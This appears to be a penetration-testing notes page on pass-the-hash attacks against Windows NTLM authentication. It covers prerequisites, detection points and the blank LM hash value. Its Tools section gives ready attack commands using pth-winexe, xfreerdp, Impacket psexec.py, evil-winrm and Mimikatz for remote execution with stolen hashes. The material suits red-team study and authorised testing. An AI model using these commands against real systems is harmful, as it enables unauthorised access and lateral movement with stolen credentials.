đź“– Notes

Search (Ctrl+K)

SearchSearch

Recent Notes

See 1409 more sorted by tag →

pass-the-hash

created Jan 08, 2024updated Jun 05, 20242 min read

Pass-the-hash (PtH) attacks work on Windows systems/services that use NTLM authentication. The plaintext password is not needed, instead the hash alone is sufficient.

Requirements

  • SMB connection
  • local admin credentials / privileges to connect to Admin$ SMB share
  • File and Print Sharing feature must be enabled
  • Local admin NTLM hash (use Mimikatz to dump)

Security Update

After the 2014 security update, PtH will work only on domain users and the built-in Administrator account (excluding other local admin accounts).

OPSEC

  • PtH may be detected by:
    • looking for new R/W handle to LSASS
    • looking for echo $hex1 > \\.\pipe\$hex2 patterns in command logs, which is how Mimikatz does it
  • RTO: “Suspicious Handle to LSASS” saved search

Some tools also asks for a LM hash. If the user has no LM hash (i.e. only NTLM hash), use aad3b435b51404eeaad3b435b51404ee (which is a blank hash, i.e. LM hash of empty string).

Tools

Note: Cobalt Strike also supports pth through built-in Mimikatz.

# RCE, no output, Linux only
pth-winexe -U $USER%$LM_HASH:$NTLM_HASH //$HOST $CMD
 
# RDP
xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:$NTLM_HASH
 
# psexec.py from Impacket
psexec.py -hashes $LM_HASH:NTLM_HASH DOMAIN/MyUser@VICTIM_IP
 
# WinRM via evil-winrm
evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH
 
# Mimikatz (pivots to user by opening a new terminal window)
mimikatz "sekurlsa::pth /user:jsmith /domain:example.com /ntlm:aabbccddeeff..." "exit"

Warning & OPSEC

Only the linux version of psexec support PtH. Sometimes psexec.py will automatically elevate to NT AUTHORITY\SYSTEM when user has enough privileges, which may not be preferable.

Use with Kerberos

See: pass-the-key

Graph View

Backlinks